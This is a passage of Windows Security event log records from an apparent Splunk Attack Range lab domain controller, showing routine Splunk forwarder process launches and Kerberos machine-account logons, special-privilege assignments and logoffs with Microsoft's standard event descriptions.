New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265197
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1620
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265199
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1558
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265198
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265200
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:03:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265203
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D4A01
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:03:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265202
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D4A01
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65073
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:03:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265201
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D4A01
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265204
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x570
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265217
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265216
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D58CA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265215
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D59B8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265214
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5A00
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265213
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D5AAE
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65078
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265212
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5AAE
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265211
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D5A00
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 65077
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265210
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5A00
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265209
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D59B8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265208
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D59B8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265207
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D58CA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65076
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265206
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D58CA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265205
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bc8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265218
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265220
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265219
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
